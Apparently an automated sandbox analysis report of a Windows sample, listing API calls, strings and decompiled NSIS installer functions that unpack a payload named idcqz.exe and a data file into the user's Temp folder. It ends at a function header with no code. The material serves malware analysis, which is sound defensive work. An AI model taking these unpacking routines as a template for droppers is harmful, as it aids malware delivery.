0x00403216
0x0040319f
0x004031a4
0x004031ac
0x004031d2
0x004031e1
0x004031e7
0x004031ec
0x004031f2
0x00000000
0x00000000
0x004031fc
0x00403204
0x00403207
0x0040320c
0x0040320e
0x0040320e
0x00000000
0x00000000
0x00000000
0x00000000
0x004031fc
0x0040321f
0x00403225
0x00403235
0x00403235
0x00403238
0x0040323e
0x0040323e
0x00000000
0x0040315e

APIs

GetTickCount.KERNEL32(7556D4C4,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004030E4
GetModuleFileNameW.KERNEL32(00000000,007B6800,00000400), ref: 00403100

Part of subcall function 0040615E: GetFileAttributesW.KERNELBASE(00000003,00403113,007B6800,80000000,00000003), ref: 00406162
Part of subcall function 0040615E: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406184

GetFileSize.KERNEL32(00000000,00000000,007B7000,00000000,007B4800,007B4800,007B6800,007B6800,80000000,00000003), ref: 00403149
GlobalAlloc.KERNELBASE(00000040,?), ref: 0040328E

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 004030DA, 0040329C
Error writing temporary file. Make sure your temp folder is valid., xrefs: 004032DA
Null, xrefs: 004031C9
Inst, xrefs: 004031B7
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403328
soft, xrefs: 004031C0
Error launching installer, xrefs: 00403120

Memory Dump Source

Source File: 00000004.00000002.984631376.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.984628051.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984636669.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984640728.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984645184.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984839010.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984846067.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984851092.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984855453.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984866339.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984871682.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984876092.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_vbc.jbxd

Similarity

API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
String ID: C:\Users\user\AppData\Local\Temp\$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
API String ID: 2803837635-2435864027
Opcode ID: 323c9084f4495cb75f4cf70951988b51dd1d9d869199bcaf0981bfe9882d4e48
Instruction ID: 583a998f33a1e047253031f1d22d0aa602d55a867c39f8e0fceec447792fd132
Opcode Fuzzy Hash: 323c9084f4495cb75f4cf70951988b51dd1d9d869199bcaf0981bfe9882d4e48
Instruction Fuzzy Hash: 0671E171940204ABCB20DFA5EE85A9E3FA8AB11316F10817FF900B62D1DB7C9E418B5D

Uniqueness

Uniqueness Score: -1.00%

Function 0040176F Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 145
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 77%

			E0040176F(FILETIME* __ebx, void* __eflags) {
				void* __esi;
				void* _t35;
				void* _t43;
				void* _t45;
				FILETIME* _t51;
				FILETIME* _t64;
				void* _t66;
				signed int _t72;
				FILETIME* _t73;
				FILETIME* _t77;
				signed int _t79;
				WCHAR* _t81;
				void* _t83;
				void* _t84;
				void* _t86;

				_t77 = __ebx;
				 *(_t86 - 8) = E00402DA6(0x31);
				 *(_t86 + 8) =  *(_t86 - 0x30) & 0x00000007;
				_t35 = E00405FB4( *(_t86 - 8));
				_push( *(_t86 - 8));
				_t81 = L"C:\\U";
				if(_t35 == 0) {
					lstrcatW(E00405F3D(E0040666E(_t81, 0x7b4000)), ??);
				} else {
					E0040666E();
				}
				E004068F5(_t81);
				while(1) {
					__eflags =  *(_t86 + 8) - 3;
					if( *(_t86 + 8) >= 3) {
						_t66 = E004069A4(_t81);
						_t79 = 0;
						__eflags = _t66 - _t77;
						if(_t66 != _t77) {
							_t73 = _t66 + 0x14;
							__eflags = _t73;
							_t79 = CompareFileTime(_t73, _t86 - 0x24);
						}
						asm("sbb eax, eax");
						_t72 =  ~(( *(_t86 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
						__eflags = _t72;
						 *(_t86 + 8) = _t72;
					}
					__eflags =  *(_t86 + 8) - _t77;
					if( *(_t86 + 8) == _t77) {
						E00406139(_t81);
					}
					__eflags =  *(_t86 + 8) - 1;
					_t43 = E0040615E(_t81, 0x40000000, (0 |  *(_t86 + 8) != 0x00000001) + 1);
					__eflags = _t43 - 0xffffffff;
					 *(_t86 - 0x38) = _t43;
					if(_t43 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t86 + 8) - _t77;
					if( *(_t86 + 8) != _t77) {
						E004056D0(0xffffffe2,  *(_t86 - 8));
						__eflags =  *(_t86 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t86 - 4)) = 1;
						}
						L31:
						 *0x7a8b28 =  *0x7a8b28 +  *((intOrPtr*)(_t86 - 4));
						__eflags =  *0x7a8b28;
						goto L32;
					} else {
						E0040666E(0x40b5f8, _t83);
						E0040666E(_t83, _t81);
						E004066AB(_t77, _t81, _t83, "C:\Users\Albus\AppData\Local\Temp",  *((intOrPtr*)(_t86 - 0x1c)));
						E0040666E(_t83, 0x40b5f8);
						_t64 = E00405CCE("C:\Users\Albus\AppData\Local\Temp",  *(_t86 - 0x30) >> 3) - 4;
						__eflags = _t64;
						if(_t64 == 0) {
							continue;
						} else {
							__eflags = _t64 == 1;
							if(_t64 == 1) {
								 *0x7a8b28 =  &( *0x7a8b28->dwLowDateTime);
								L32:
								_t51 = 0;
								__eflags = 0;
							} else {
								_push(_t81);
								_push(0xfffffffa);
								E004056D0();
								L29:
								_t51 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t51;
				}
				E004056D0(0xffffffea,  *(_t86 - 8));
				 *0x7a8b54 =  *0x7a8b54 + 1;
				_t45 = E00403377(_t79,  *((intOrPtr*)(_t86 - 0x28)),  *(_t86 - 0x38), _t77, _t77); // executed
				 *0x7a8b54 =  *0x7a8b54 - 1;
				__eflags =  *(_t86 - 0x24) - 0xffffffff;
				_t84 = _t45;
				if( *(_t86 - 0x24) != 0xffffffff) {
					L22:
					SetFileTime( *(_t86 - 0x38), _t86 - 0x24, _t77, _t86 - 0x24); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t86 - 0x20)) - 0xffffffff;
					if( *((intOrPtr*)(_t86 - 0x20)) != 0xffffffff) {
						goto L22;
					}
				}
				CloseHandle( *(_t86 - 0x38)); // executed
				__eflags = _t84 - _t77;
				if(_t84 >= _t77) {
					goto L31;
				} else {
					__eflags = _t84 - 0xfffffffe;
					if(_t84 != 0xfffffffe) {
						E004066AB(_t77, _t81, _t84, _t81, 0xffffffee);
					} else {
						E004066AB(_t77, _t81, _t84, _t81, 0xffffffe9);
						lstrcatW(_t81,  *(_t86 - 8));
					}
					_push(0x200010);
					_push(_t81);
					E00405CCE();
					goto L29;
				}
				goto L33;
			}

0x0040176f
0x00401776
0x00401782
0x00401785
0x0040178a
0x0040178d
0x00401794
0x004017b0
0x00401796
0x00401797
0x00401797
0x004017b6
0x004017bb
0x004017bb
0x004017bf
0x004017c2
0x004017c7
0x004017c9
0x004017cb
0x004017d0
0x004017d0
0x004017db
0x004017db
0x004017ec
0x004017ee
0x004017ee
0x004017ef
0x004017ef
0x004017f2
0x004017f5
0x004017f8
0x004017f8
0x004017ff
0x0040180e
0x00401813
0x00401816
0x00401819
0x00000000
0x00000000
0x0040181b
0x0040181e
0x00401874
0x00401879
0x004015b6
0x0040292e
0x0040292e
0x00402c2a
0x00402c2d
0x00402c2d
0x00000000
0x00401820
0x00401826
0x0040182d
0x0040183a
0x00401845
0x0040185b
0x0040185b
0x0040185e
0x00000000
0x00401864
0x00401864
0x00401865
0x00401882
0x00402c33
0x00402c33
0x00402c33
0x00401867
0x00401867
0x00401868
0x00401493
0x0040239d
0x0040239d
0x0040239d
0x00401865
0x0040185e
0x00402c35
0x00402c39
0x00402c39
0x00401892
0x00401897
0x004018a5
0x004018aa
0x004018b0
0x004018b4
0x004018b6
0x004018be
0x004018ca
0x004018b8
0x004018b8
0x004018bc
0x00000000
0x00000000
0x004018bc
0x004018d3
0x004018d9
0x004018db
0x00000000
0x004018e1
0x004018e1
0x004018e4
0x004018fc
0x004018e6
0x004018e9
0x004018f2
0x004018f2
0x00401901
0x00401906
0x00402398
0x00000000
0x00402398
0x00000000

APIs

lstrcatW.KERNEL32 ref: 004017B0
CompareFileTime.KERNEL32(-00000014,?,C:\Users\user\AppData\Local\Temp\idcqz.exe C:\Users\user\AppData\Local\Temp\dknqrab,C:\Users\user\AppData\Local\Temp\idcqz.exe C:\Users\user\AppData\Local\Temp\dknqrab,00000000,00000000,C:\Users\user\AppData\Local\Temp\idcqz.exe C:\Users\user\AppData\Local\Temp\dknqrab,007B4000,?,?,00000031), ref: 004017D5

Part of subcall function 0040666E: lstrcpynW.KERNEL32(?,?,00000400,004037B6,007A7AA0,NSIS Error), ref: 0040667B

Part of subcall function 004056D0: lstrlenW.KERNEL32(007A0F68,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405708
Part of subcall function 004056D0: lstrlenW.KERNEL32(004030A8,007A0F68,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405718
Part of subcall function 004056D0: lstrcatW.KERNEL32 ref: 0040572B
Part of subcall function 004056D0: SetWindowTextW.USER32 ref: 0040573D
Part of subcall function 004056D0: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405763
Part of subcall function 004056D0: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040577D
Part of subcall function 004056D0: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040578B

Strings

C:\Users\user\AppData\Local\Temp, xrefs: 00401835, 00401851
C:\Users\user\AppData\Local\Temp\idcqz.exe C:\Users\user\AppData\Local\Temp\dknqrab, xrefs: 0040178D, 00401796, 004017A3, 004017B5, 004017C1, 004017F7, 0040180D, 0040182B, 00401867, 004018E8, 004018F1, 004018FB, 00401906

Memory Dump Source

Source File: 00000004.00000002.984631376.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.984628051.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984636669.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984640728.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984645184.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984839010.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984846067.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984851092.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984855453.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984866339.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984871682.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984876092.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_vbc.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\idcqz.exe C:\Users\user\AppData\Local\Temp\dknqrab
API String ID: 1941528284-1084134097
Opcode ID: c88ed36c007d22437061545d9d5dec38a2b75a4754de15431c99bf9f19713014
Instruction ID: c895feda3e823d9c0bc0fb7144dfd3dc41df657037fc16576ccee127d24ab7e8
Opcode Fuzzy Hash: c88ed36c007d22437061545d9d5dec38a2b75a4754de15431c99bf9f19713014
Instruction Fuzzy Hash: CB41D571800108BACF11BBB5DD85DAE7679EF45328F20463FF422B11E1DB3D89619A2E

Uniqueness

Uniqueness Score: -1.00%

Function 004069CB Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E004069CB(intOrPtr _a4) {
				short _v576;
				signed int _t13;
				struct HINSTANCE__* _t17;
				signed int _t19;
				void* _t24;

				_t13 = GetSystemDirectoryW( &_v576, 0x104);
				if(_t13 > 0x104) {
					_t13 = 0;
				}
				if(_t13 == 0 ||  *((short*)(_t24 + _t13 * 2 - 0x23e)) == 0x5c) {
					_t19 = 1;
				} else {
					_t19 = 0;
				}
				wsprintfW(_t24 + _t13 * 2 - 0x23c, L"%s%S.dll", 0x40a014 + _t19 * 2, _a4);
				_t17 = LoadLibraryExW( &_v576, 0, 8); // executed
				return _t17;
			}

0x004069e2
0x004069eb
0x004069ed
0x004069ed
0x004069f1
0x00406a04
0x004069fe
0x004069fe
0x004069fe
0x00406a1d
0x00406a31
0x00406a38

APIs

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004069E2
wsprintfW.USER32 ref: 00406A1D
LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406A31

Strings

%s%S.dll, xrefs: 00406A17
\, xrefs: 004069F3
UXTHEME, xrefs: 004069D4

Memory Dump Source

Source File: 00000004.00000002.984631376.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.984628051.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984636669.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984640728.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984645184.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984839010.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984846067.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984851092.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984855453.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984866339.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984871682.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984876092.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_vbc.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%S.dll$UXTHEME$\
API String ID: 2200240437-1946221925
Opcode ID: 63130bafcb32548bd4340548baa3f8658423137b3882cd96386db367ad08b740
Instruction ID: edb644a17e19fa0d5d66c6da3b257654e99a3b388903ea93700411201bdfbebd
Opcode Fuzzy Hash: 63130bafcb32548bd4340548baa3f8658423137b3882cd96386db367ad08b740
Instruction Fuzzy Hash: 37F0F671600219A7DB14BB64DD0EF9B376CAB00304F11447AA646F10D0FB7CDB68CB98

Uniqueness

Uniqueness Score: -1.00%

Function 0040347F Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 101
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 93%

			E0040347F(intOrPtr _a4) {
				intOrPtr _t11;
				signed int _t12;
				void* _t15;
				long _t16;
				void* _t18;
				intOrPtr _t30;
				intOrPtr _t33;
				intOrPtr _t35;
				void* _t36;
				intOrPtr _t48;

				_t33 =  *0x79f734 -  *0x40ce60 + _a4;
				 *0x7a8aac = GetTickCount() + 0x1f4;
				if(_t33 <= 0) {
					L22:
					E0040302E(1);
					return 0;
				}
				E004035FE( *0x79f744);
				SetFilePointer( *0x40a01c,  *0x40ce60, 0, 0); // executed
				 *0x79f740 = _t33;
				 *0x79f730 = 0;
				while(1) {
					_t30 = 0x4000;
					_t11 =  *0x79f738 -  *0x79f744;
					if(_t11 <= 0x4000) {
						_t30 = _t11;
					}
					_t12 = E004035E8(0x793730, _t30);
					if(_t12 == 0) {
						break;
					}
					 *0x79f744 =  *0x79f744 + _t30;
					 *0x40ce68 = 0x793730;
					 *0x40ce6c = _t30;
					L6:
					L6:
					if( *0x7a8ab0 != 0 &&  *0x7a8b40 == 0) {
						 *0x79f730 =  *0x79f740 -  *0x79f734 - _a4 +  *0x40ce60;
						E0040302E(0);
					}
					 *0x40ce70 = 0x78b730;
					 *0x40ce74 = 0x8000;
					if(E00406B96(?str?) < 0) {
						goto L20;
					}
					_t35 =  *0x40ce70; // 0x78bb5b
					_t36 = _t35 - 0x78b730;
					if(_t36 == 0) {
						__eflags =  *0x40ce6c; // 0x0
						if(__eflags != 0) {
							goto L20;
						}
						__eflags = _t30;
						if(_t30 == 0) {
							goto L20;
						}
						L16:
						_t16 =  *0x79f734;
						if(_t16 -  *0x40ce60 + _a4 > 0) {
							continue;
						}
						SetFilePointer( *0x40a01c, _t16, 0, 0);
						goto L22;
					}
					_t18 = E00406210( *0x40a01c, 0x78b730, _t36); // executed
					if(_t18 == 0) {
						_push(0xfffffffe);
						L21:
						_pop(_t15);
						return _t15;
					}
					 *0x40ce60 =  *0x40ce60 + _t36;
					_t48 =  *0x40ce6c; // 0x0
					if(_t48 != 0) {
						goto L6;
					}
					goto L16;
					L20:
					_push(0xfffffffd);
					goto L21;
				}
				return _t12 | 0xffffffff;
			}

0x0040348f
0x004034a2
0x004034a7
0x004035d7
0x004035d9
0x00000000
0x004035df
0x004034b3
0x004034c6
0x004034cc
0x004034d2
0x004034dd
0x004034e2
0x004034e7
0x004034ef
0x004034f1
0x004034f1
0x004034fa
0x00403501
0x00000000
0x00000000
0x00403507
0x0040350d
0x00403513
0x00000000
0x00403519
0x0040351f
0x0040353f
0x00403544
0x00403549
0x0040354f
0x00403555
0x00403566
0x00000000
0x00000000
0x00403568
0x0040356e
0x00403570
0x00403593
0x00403599
0x00000000
0x00000000
0x0040359b
0x0040359d
0x00000000
0x00000000
0x0040359f
0x0040359f
0x004035b2
0x00000000
0x00000000
0x004035c1
0x00000000
0x004035c1
0x0040357a
0x00403581
0x004035ce
0x004035d4
0x004035d4
0x00000000
0x004035d4
0x00403583
0x00403589
0x0040358f
0x00000000
0x00000000
0x00000000
0x004035d2
0x004035d2
0x00000000
0x004035d2
0x00000000

APIs

GetTickCount.KERNEL32(00000000,00000000,?,00000000,004033A9,00000004,00000000,00000000,?,?,00403323,000000FF,00000000,00000000,?,?), ref: 00403493

Part of subcall function 004035FE: SetFilePointer.KERNELBASE(00000000,00000000,00000000,004032FC,?), ref: 0040360C

SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,004033A9,00000004,00000000,00000000,?,?,00403323,000000FF,00000000,00000000,?,?), ref: 004034C6
SetFilePointer.KERNEL32(?,00000000,00000000,-Ly,00793730,00004000,?,00000000,004033A9,00000004,00000000,00000000,?,?,00403323,000000FF), ref: 004035C1

Strings

07y, xrefs: 004034F3
-Ly, xrefs: 0040350D, 0040354A

Memory Dump Source

Source File: 00000004.00000002.984631376.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.984628051.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984636669.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984640728.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984645184.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984839010.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984846067.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984851092.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984855453.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984866339.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984871682.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984876092.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_vbc.jbxd

Similarity

API ID: FilePointer$CountTick
String ID: -Ly$07y
API String ID: 1092082344-230390750
Opcode ID: 5ef9f3cf75525ab0b28f5e9a18968e2fb4815e048a68f3a4626f05087b93d5e0
Instruction ID: fa4fce997e9b0d1f670701ff0d5ea0446f36afc43afd7a1273bf0b0fb6409833
Opcode Fuzzy Hash: 5ef9f3cf75525ab0b28f5e9a18968e2fb4815e048a68f3a4626f05087b93d5e0
Instruction Fuzzy Hash: 6E31AEB2510215EFCB209F69FE8492A3BADF74475A714423BE401B22F0DB795D02CB9D

Uniqueness

Uniqueness Score: -1.00%

Function 00405B9F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00405B9F(WCHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				struct _SECURITY_DESCRIPTOR _v36;
				int _t22;
				long _t23;

				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
				_v36.Owner = 0x4083f8;
				_v36.Group = 0x4083f8;
				_v36.Sacl = _v36.Sacl & 0x00000000;
				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
				_v16.lpSecurityDescriptor =  &_v36;
				_v36.Revision = 1;
				_v36.Control = 4;
				_v36.Dacl = 0x4083e8;
				_v16.nLength = 0xc;
				_t22 = CreateDirectoryW(_a4,  &_v16); // executed
				if(_t22 != 0) {
					L1:
					return 0;
				}
				_t23 = GetLastError();
				if(_t23 == 0xb7) {
					if(SetFileSecurityW(_a4, 0x80000007,  &_v36) != 0) {
						goto L1;
					}
					return GetLastError();
				}
				return _t23;
			}

0x00405baa
0x00405bae
0x00405bb1
0x00405bb7
0x00405bbb
0x00405bbf
0x00405bc7
0x00405bce
0x00405bd4
0x00405bdb
0x00405be2
0x00405bea
0x00405bec
0x00000000
0x00405bec
0x00405bf6
0x00405bfd
0x00405c13
0x00000000
0x00000000
0x00000000
0x00405c15
0x00405c19

APIs

CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405BE2
GetLastError.KERNEL32 ref: 00405BF6
SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405C0B
GetLastError.KERNEL32 ref: 00405C15

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405BC5

Memory Dump Source

Source File: 00000004.00000002.984631376.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.984628051.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984636669.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984640728.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984645184.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984839010.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984846067.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984851092.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984855453.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984866339.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984871682.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984876092.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_vbc.jbxd

Similarity

API ID: ErrorLast$CreateDirectoryFileSecurity
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 3449924974-4017390910
Opcode ID: 4d8c721838b8a92ea27708fe49d100345a2f80ebd1be40878b53e15a1b169c58
Instruction ID: a4b5b825bdd4266eac6b0ee8a32438dce20ed58698919e53373cd8165130f89a
Opcode Fuzzy Hash: 4d8c721838b8a92ea27708fe49d100345a2f80ebd1be40878b53e15a1b169c58
Instruction Fuzzy Hash: 31010871D04219EAEF009BA0C944BEFBFB8EF04314F00403AD545B6191E7799A48CF99

Uniqueness

Uniqueness Score: -1.00%

Function 0040618D Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0040618D(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				intOrPtr _v8;
				short _v12;
				short _t12;
				intOrPtr _t13;
				signed int _t14;
				WCHAR* _t17;
				signed int _t19;
				signed short _t23;
				WCHAR* _t26;

				_t26 = _a4;
				_t23 = 0x64;
				while(1) {
					_t12 =  *L"nsa"; // 0x73006e
					_t23 = _t23 - 1;
					_v12 = _t12;
					_t13 =  *0x40a5ac; // 0x61
					_v8 = _t13;
					_t14 = GetTickCount();
					_t19 = 0x1a;
					_v8 = _v8 + _t14 % _t19;
					_t17 = GetTempFileNameW(_a8,  &_v12, 0, _t26); // executed
					if(_t17 != 0) {
						break;
					}
					if(_t23 != 0) {
						continue;
					} else {
						 *_t26 =  *_t26 & _t23;
					}
					L4:
					return _t17;
				}
				_t17 = _t26;
				goto L4;
			}

0x00406193
0x00406199
0x0040619a
0x0040619a
0x0040619f
0x004061a0
0x004061a3
0x004061a8
0x004061ab
0x004061b5
0x004061c2
0x004061c6
0x004061ce
0x00000000
0x00000000
0x004061d2
0x00000000
0x004061d4
0x004061d4
0x004061d4
0x004061d7
0x004061da
0x004061da
0x004061dd
0x00000000

APIs

GetTickCount.KERNEL32(7556D4C4,C:\Users\user\AppData\Local\Temp\,?,?,?,00403644,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403929), ref: 004061AB
GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,?,00403644,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403929), ref: 004061C6

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00406192
nsa, xrefs: 0040619A

Memory Dump Source

Source File: 00000004.00000002.984631376.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.984628051.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984636669.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984640728.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984645184.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984839010.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984846067.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984851092.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984855453.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984866339.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984871682.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984876092.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_vbc.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-4262883142
Opcode ID: 6315ab6e6f8253ba2c88c9b6803a176270f8621abb800126aa0f3c3b7b9ef66c
Instruction ID: 4618a7cd5e379287717806b061479f75a97df545f28ae60e57938b9bb9b89627
Opcode Fuzzy Hash: 6315ab6e6f8253ba2c88c9b6803a176270f8621abb800126aa0f3c3b7b9ef66c
Instruction Fuzzy Hash: 4CF09676700214BFDB008F55ED05E9AB7BCEF91710F11803AEE05E7150E6B099548764

Uniqueness

Uniqueness Score: -1.00%

Function 00403377 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 92%

